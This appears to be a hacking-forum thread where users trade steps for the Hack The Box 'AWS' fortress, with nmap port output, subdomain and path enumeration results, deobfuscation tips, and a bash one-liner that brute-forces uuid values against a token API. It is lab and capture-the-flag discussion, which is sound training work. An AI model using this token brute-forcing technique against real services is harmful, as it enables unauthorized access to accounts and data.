Fortresses_AWS
Hello brudas,

A new fortress has been released on HTB, named AWS.

Let's discuss it.

[code]
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
2179/tcp open  vmrdp
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
[/code]
Reply
Found: jobs.amzcorp.local (Status: 503) [Size: 299]
Found: cloud.amzcorp.local (Status: 503) [Size: 299]
Found: inventory.amzcorp.local (Status: 503) [Size: 299]
Found: workflow.amzcorp.local (Status: 503) [Size: 299]
Reply
Paths on workflow:
home[Status:302,
calendar[Status:302,
health[Status:200,
code[Status:302,
back[Status:302,
log[Status:302,
graph[Status:302,
tree[Status:302,
plugin[Status:302,
task[Status:302,
provider[Status:302,
configuration[Status:302,
redoc[Status:200,
confirm[Status:302,
trigger[Status:302,
tries[Status:302,

Paths on inventory:
home[Status:500,
logout[Status:500,
items[Status:500,
settings[Status:500,
po[Status:500,
delete[Status:500,
pay[Status:500,
otp[Status:405,
emails[Status:200,
Reply
(July 12, 2022, 02:59 AM)F4nny Wrote: Found: jobs.amzcorp.local (Status: 503) [Size: 299]
Found: cloud.amzcorp.local (Status: 503) [Size: 299]
Found: inventory.amzcorp.local (Status: 503) [Size: 299]
Found: workflow.amzcorp.local (Status: 503) [Size: 299]


I got different status codes after the machine reset:

jobs.amzcorp.local (Status: 302) [Size: 218]
cloud.amzcorp.local (Status: 403) [Size: 309]
inventory.amzcorp.local (Status: 200) [Size: 6675]
workflow.amzcorp.local (Status: 302) [Size: 217]
Reply
[code]for i in {950..975}; do echo -n '{"get_token":"True","uuid":'$i',"username":"admin"}' | base64; done | xargs -I{} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"[/code]
[code]Early Access Flag[/code]
Reply
If anyone is wondering, you find the place to exploit by deobfuscating app.js at http://jobs.amzcorp.local/static/assets/js/app.js
Reply
(July 12, 2022, 06:22 PM)paulwatson42016 Wrote: If anyone is wondering, you find the place to exploit by deobfuscating app.js at http://jobs.amzcorp.local/static/assets/js/app.js


Been trying to deobfuscate that for hours. How did you do it?
Reply
(July 12, 2022, 07:06 PM)derek Wrote:
(July 12, 2022, 06:22 PM)paulwatson42016 Wrote: If anyone is wondering, you find the place to exploit by deobfuscating app.js at http://jobs.amzcorp.local/static/assets/js/app.js


Been trying to deobfuscate that for hours. How did you do it?


https://lelinhtinh.github.io/de4js/
Try this and click on Auto Decode.
Reply
How are we supposed to use the token? Is it a cookie? A localStorage?
Reply
(July 13, 2022, 11:45 AM)fironeDerbert Wrote: How are we supposed to use the token? Is it a cookie? A localStorage?


In cookies: api_token
Is anybody able to edit a user?
Reply